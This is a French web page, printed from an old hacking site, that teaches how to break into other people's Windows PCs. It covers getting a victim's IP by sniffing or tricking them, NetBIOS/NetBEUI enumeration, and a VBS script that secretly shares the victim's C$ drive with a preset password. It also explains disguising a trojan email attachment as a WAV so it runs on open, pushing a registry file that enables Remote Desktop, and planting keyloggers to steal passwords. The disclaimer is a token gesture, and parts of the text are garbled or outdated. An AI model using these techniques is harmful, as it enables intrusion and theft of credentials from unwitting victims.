Vous êtes sur la page 1sur 8

http://sitesimons.free.fr/pirater pc a distance.

htm

S' infiltrer dans un PC facilement

1°) NetBios

2°) NetBeui

3°) Pour les


Lamers 1) trouver l' ip de l' ordi à pénétrer :
4°) Hack XP
soit en utilisant un sniffer; truc pratique qui récupère
toutes sortes d'infos sur le web (ip, pass, cb, ...)
5)FTP
soit sur IRC. Il faut simplement saisir la commande /dns pseudo cela donnera l'IP de la
personne.

soit encore mieux, il faut que la victime vous envoie un mail, l'adresse ce trouve alors dans les
Headers du mail .

si vous connaissez le mail de votre victime utilisez tous les procédés possibles pour que la
victime vous envoie un message par exemple faites un faux formulaire d'abonnement a un truc
payant et dire que si la victime veut contester elle doit répondre sous X jours pour annuler la
procédure

ou utilisez le social engineering en faisant une page Web dans le corps du mail et forcer votre
victime a vous envoyer un mail sans qu' elle le sache ( voir FAKE MAIL dans PIRATER UN
COMPTE E-MAIL )...

Bon, Maintenant que vous avez l'adresse IP, vérifiez que Le voisinage Réseau soit installé
sur votre PC (c'est très important)

Editez un fichier lmhost dans le repertoire c:\Windows de votre machine


(lmhost tout en minuscule et sans extension).
Dans ce fichier mettez :

135.254.25.245 "nom" <<IP + nom du PC de la victime

pour connaître le nom du PC de la victime, allez sous dos ( démarrer / exécuter / cmd ) et
tapez :

nbtstat -A 135.254.25.245 <<<<IP de la victime

Et lisez les infos :

NetBIOS Remote Machine Name Table Name Type Status

nom <00> UNIQUE Registered <<<<<C'est bon car UNIQUE


groupe <00> GROUP Registered <<<<< group ça sert a rien

MAC Adress = 44-45-13-74-00-00

1 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

"nom" et "groupe" sont des exemples de noms d'ordinateurs

[ ou alors on va donner renommer l' ordi de la victime avec ce petit script .vbs :

set WshShell = CreateObject("Wscript.Shell")


WshShell.RegDelete"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
\ComputerName\"
WshShell.RegWrite"HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
\ComputerName\ComputerName\"nouveau nom"

a la place de nouveau nom mettez celui que vous voulez

recopiez dans le bloc notes, enregistrez en ce que vous voulez.vbs, envoyez ça a votre victime
et le tour est joué! ]

Voila, relevez le nom de la machine de la victime et inscrivez le dans lmhost

Dans lmhost, on peut en mettre plusieurs a la suite en récrivant


toujours #...... et en dessous IP+"nom" sans passer de ligne.

PS: quand vous mettez le nom de la machine dans


lmhost, essayez de le mettre entre "" ou sans rien .

Voila, après, retournez sous dos et tapez :


nbtstat -R

Vous obtenez :
Successful purge and preload of the NBT Remote cache Name Table

( ou en français, purge et préchargement de la table nom de cache distant NBT terminés )

si vous obtenez: le NetBT n' est lié à aucun périphérique; C' est qu' il y a une erreur quelque
part

Après, allez dans WINDOWS et faites

MENU DEMARRER \RECHERCHER \ORDINATEUR .

Apres, mettez le nom du PC de la victime : ici "NOM" et faites rechercher.

si vous trouvez quelque' un, c' est parfait vous pouvez passer a la deuxième étape, sinon y' a
une couille quelque part.

2) : l'accès total
vous êtes dan le pc de votre victime mais vous pouvez rien faire,, A moin qu'' elle ait
partagé son disque dur;; !!!

Si son DD n'' est pas partagé,, on va faire en sorte qu'' il le devienne sans qu'' elle la
!!!
sache!!!

2 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

C''est très simple,, pour ça nous allons éditer un fichier . VBS qui va lui faire partager C::

après ça n'' importe qui pourra contrôler entièrement son PC

ouvrez le BlocNote et >recopiez<


> < ((eh oui c'' est en écrivant qu'' on apprend,, et en plus ça
vous fera de l'' exercice)
) le texte puis enregistrer sous "partage.
" . vbs""

Voici le code source du fichier VBS::

Set X = CreateObject("WScript.Shell")
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Flags",770, "REG_DWORD"
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Parmlenc", 6837, "REG_BINARY"
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Parm2enc", 0, "REG_BINARY"
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Path", "C:\","REG_SZ"
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Remark","","REG_SZ"
X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan
\C$\Type", 0, "REG_DWORD"

une fois que la victime a ouvert le fichier,, vous ferez un click droit sur "Voisinage
" réseau""
pour sélectionner "Se
" ..."
connecter à un lecteur réseaux..."

Dans le chemin d''accès vous spécifiez :

\\L' IP DE VICTIME\C$

Avec le symbole $ le partage du "C:" est invisible.

Une fois tapé il donnera le mot de passe qui ici est deux fois le caractère ASCII numéro
128, représenté encodé dans le registre par la valeur 6837.

THÉORIQUEMENT, (si HD est C: sous windobe) vous aurez un truc à peu prés dans le genre:

L'adresse n'a pas été reconnue


Firefox ne sait pas ouvrir cette adresse car le protocole (c) n'est associé à
aucun programme.

Il est peut-être nécessaire d'installer une autre application pour ouvrir ce


type d'adresse.

3 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

Ne modifiez rien dans ce cadre, c' est REELLEMENT votre disque dur

3) : que faire ???

Une fois que vous avez accès à son disque dur,, plus aucun problèmes pour vous... ... vous
n''avez plus qu''a trouver un troyen à lui installer sur son PC,, peut être un Keylogger,,
lui voler ses fichier password et prendre son compte Internet ou ses pass AOL ( si il a
un forfait illimité )...

( mais surtout,, ne modifiez rien,, vous devez être le plus safe possible.. Si n'' importe qui s''
aperçoit de votre intrusion;; vous pouvez vous faire baiser.)
.)

Attention,, pénétrer un ordinateur est illégal et sévèrement punit par la loi avec
....
de la prison et une très lourde amende....
Tout ce qui est la c''est pour vous montrer qu'' il est facile de se faire infiltrer,, pas de
passer a l'' acte

moi et mon hébergeur ne seront être tenus responsable de ce que vous ferez de ces infos

Variante d' infiltration d' un PC avec Netbeui:

Bon netbeui c'est simple. Il y a deux cas possibles: soit le pc fonctionne sous Win 95/98 ou
alors sous NT.
Tout d’abord, vous téléchargez un scanneur netbios ( ScanIP >>> télécharger ) vous relevez les
IP avec des ressources partagées (avec les + devant).
Pour NT : vous allez dans démarrer/rechercher/ordinateur et la vous mettez le nom de l’ordi
que vous avez trouvé et vous lancez la recherche. vous l’avez trouvé ? maintenant il n'y a plus
qu’a ce connecter dessus et regarder ce qui est partagé.
Maintenant si ça marche pas c' est que le PC est sous 9x, il faut aller sous DOS et éditer un
fichier lmhost comme au dessus

Dans ce fichier vous marquer : ip-de-l’ordi nom #pre (ex : 193.250.106.23 home #pre)
Une fois que vous avez sauvé le fichier faites (sous dos) : nbtstat -R
Vous devez obtenir : Successful purge and preload of the NBT Remote Cache Name Table.
Ensuite tapez: net view \\nom-ordi (cela sert a voir les ressources partagées de votre victime).
Vous obtiendrez donc un truc du genre :

Nom de partage Type Commentaire


------------------------------------------------------
C Disque
Exécution achevée.

Ici on voit que seul le disque C est en ressource partagé.


Il ne vous reste plus qu’a vous connecter dessus sous dos ou sous windows.

Pour vous connecter dessus sous DOS faites : net use \\nom-ordi\c

4 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

Pour vous connecter dessus via windows faites comme pour NT ( mais après avoir fait tout ce
que je viens d’expliquer).
Voilà c’est simple non ?!

astuce
lorsque vous scannez les IP, dans le prog, on doit mettre un IP de départ et d'arrivée > mettez
le votre en départ et changer seulement les derniers chiffres dans l' IP d'arrivée > vous allez
tomber sur des gens qui sont sur le même fournisseur que vous (du moins souvent) et là vous
pouvez leur piquer leur .ini avec n° d'identifiant et tout et tout...

Lorsque vous êtes dans le disque dur >vous pouvez (si son disque est en accès complet, et ça
arrive plus souvent qu'on ne le croit) lui laisser un petit mot sur son bureau et lui changer sont
fond d'écran (en éditant son "win.ini").

Pirater quelque'' un:: Version lamer

Si vous ne voulez pas des bonnes vieilles méthodes, utilisez cette méthode!

1°) Choix du troyen: ----> allez voir les utilitair es

2°) Envoi du troyen:

problème:

généralement quand vous envoyez un mail avec un troyen en pièce jointe,, en bas du
( voir les headers)
code( ) vous avez ça::

Content-- Type : application/


/ octet-- stream;; name=
=TROYEN.. EXE

quelqu'' un de classique verra le nom de la pièce jointe et ne l'' ouvrira pas !

solution:

Retournez voir le Script du mail et transformez la ligne que j''ai recopié un peut plus haut
en mettant "audio/
" / X-- wav""

ça donne : Content-- Type : audio/


/X-- wav;; name=
=TROYEN.. EXE

vous devez bien sur envoyer votre mail en format HTML.. Dans le corps (la
( ou on écrit
) vous devez ajouter cette frame::
habituellement)

<iframe src=3
=3Dcid:
=3 : TROYEN></
></iframe>
></ >

Windows considérera que votre fichier sera un son wav... ... et comme il est programmé
pour lancer le son sans rien demander à personne et surtout sans clique de la part de la
victime.. ça y est!! votre victime ouvre le mail et est infectée....
.... on dit merci qui? Merci
Billou

5 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

"Hacker" un Pc tournant sous XP


Je met bien hacker entre guillemets car la suite je ne sais pas vraiment si c' est du hacking.

vous avez vu dans les trucs divers un article sur les ressources partagées, et que ce n' était pas
vraiment du hacking car Kro$hiot avait prévu netbios pour le travail à distance.

bon, je commence:

pour commencer vous devez (sous xp) être sur une session de type administrateur et avoir le
bureau à distance d' installé (regardez dans: démarrer/ tous les programmes/ accessoires/
communications/ connexion bureau à distance)

ensuite dans panneau de configuration/ connexions réseau/ [nom de votre connexion Internet]
\propriétés/ gestion réseau/ regardez si vous voyez "client pour les réseaux Microsoft" de coché
et d' installé, c' est bon ??, si ce n' est pas le cas, eh bien il va falloir ressortir votre bon vieux cd
d' installation de xp et cliquer sur installer / client (pour ceux comme moi qui n' ont pas le cd d'
Install je suis en train de chercher un package, patience!). Et tant qu' a faire installer/ service
et installer/ protocole/ Pilote de moniteur réseau(pour ce dernier pas besoin de cd).

ensuite, clic droit/ propriétés / sur poste de travail et allez sur l' onglet "à distance", il y à une
case et elle, doit être cochée.

Apres, vous pouvez ouvrir votre bureau à distance et entrer l' ip d' une victime qui à les
conditions requises pour pouvoir se faire infiltrer (ce qui revient à dire terminal server sous
windobe 2000 et 2003 sever system, et pour xp que dans les propriétés de connexions son
pare-feu autorise le bureau à distance et les connexions entrantes (en gros il faut que vous
trouviez un pigeon qui utilise le bureau à distance pour des raisons "honnêtes")

Et si ce n' est pas le cas eh bien va falloir trouver comment faire en sorte que la victime
devienne dans cette situation. Pour ça je ne vois que la base de registres: je sors pour vous
mon "active registry monitor" et je lance une première analyse de la BDR.

ensuite je fais comme si je voulais que n' importe qui puisse accéder à mon PC par ce fameux
bureau a distance (modification des options de connexion, modification du firewall d' xp, ......) et
je lance une deuxième analyse de la BDR pour enfin comparer le modifications qui ont été
apportées.

Je vois qu' il y en à beaucoup! je ne m' attendait pas à ça! Comme je suis parfois un peu
flémard sur les bord je ne me fait pas chier je sauvegarde avec mon soft sous Redo.reg et je
modifie juste les trucs qui serviraient à identifier mon PC du genre clés GUID ou des trucs
comme ça (histoire que ça ne me retombe pas dessus) ensuite je me connecte avec le bureau
à distance à 127.0.0.1 et je teste (ça marche). je quitte, je rétablis les modifs que j' ai apporté à
mon PC, je re teste et la j' ai un message d' erreur du B.a.D donc c' est bon signe pour moi (
eh, j' ai quand même pas envie que vous testiez sur moi! ;-).

Allez, je mets ce fichier de 89 Ko a votre disposition ici (petit Ps: SURTOUT NE L' EXECUTEZ
PAS SUR VOTRE PC sinon c' est la cata pour vous!)

Voilà, demerdez vous pour envoyer ce fichier à votre victime sous la forme que vous voulez
(vbscipt, html contenant vbscript, batch, exe,... enfin pas de miracle allez au sommaire et
regardez mes cours de programmation.

ce tutorial se termine à présent j' espère que vous avez eu une agréable lecture !

et si vous avez des modifications à apporter, des suggestions, ... sur cet article mailez moi

6 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

Hacker un PC par ftp avec IE

Bon, là je ne suis absolument pas sur de ce que j' avance,

tout à commencé quand j' ai voulu hacker un site par ftp, j' ai réglé les options avancées d' IE
pour l' affichage des dossiers ftp, le forçage de terminal serveur hors écran, et l' acceptation du
ftp passif. Jusque là j' ai simplement voulu faire de IE un client FTP pour hacker un site (je ne
vous dirai jamais lequel !!!)

J' ai ouvert dans l' url: ftp://ftp.site.com/ et j' ai eu accès en lecture aux dossiers, mais ce que
je voulais était un accès complet donc j' ai fait un clic droit/ se connecter en tant que/ ouvrir une
session anonyme et ça à marché (j' ai eu du bol le site n' était pas protégé)

après j' ai essayé off line sur mon PC avec l' IP 127.0.0.1 ( ftp://127.0.0.1/C:\ ) et j' ai eu accès à
mon lecteur partagé C: !!!! et le pire est que mon firewall pourtant bien configuré n' a rien dit !

alors si vous avez le temps essayez sur l' ip de quelqu' un suivant le même modèle et si ça
marche pas, eh bin essayez de vous connecter en tant que anonymous.

PS: peut-être qu' il faut que le hd soit en partage? je sais pas je n' ai pas eu le temps de tester
sur une victime!

Si vous utilisez vnc: pour le gars qui a kazaa, le port 1214 (par défaut) est ouvert donc essayez
de vous servir de ce port.

Dans les trucs divers j' ai exposé une faille P2P que j' ai découverte: Sur KaZaA le dossier
partagé se trouve sur C:\My Shared Folder. alors essayez ceci:

ftp://***.***.***.***/C:\My Shared Folder\ ou ***.***.... représente l' IP du gars dont vous êtes
sur qu' il utilise KaZaa.

Ou, essayez: ftp://***.***.***.***/C:\My Shared Folder\:1214

ou encore: ftp://***.***.***.***:1214 enfin un truc dans le genre (essayez vous aurez beaucoup
de possibilités)

ou alors comme pour les "failles" netbios et netbeui; utilisation de net use: pareil mais au lieu
de \\nom_ordi\C$

ou vous spécifiez C: comme partage (si il l' est! --> conditions citées plus haut pour netbios...)
spécifiez le dossier partagé, ce qui donne un truc comme: \\nom_ou_ip_de_ordi\C:\My
Shared Folder

enfin dans cet article je vous ai plutôt donné des tuyaux et indices qu' un vrai bon tutoriel, ---->
testez
@++

7 sur 8 28/08/2013 18:20


http://sitesimons.free.fr/pirater pc a distance.htm

8 sur 8 28/08/2013 18:20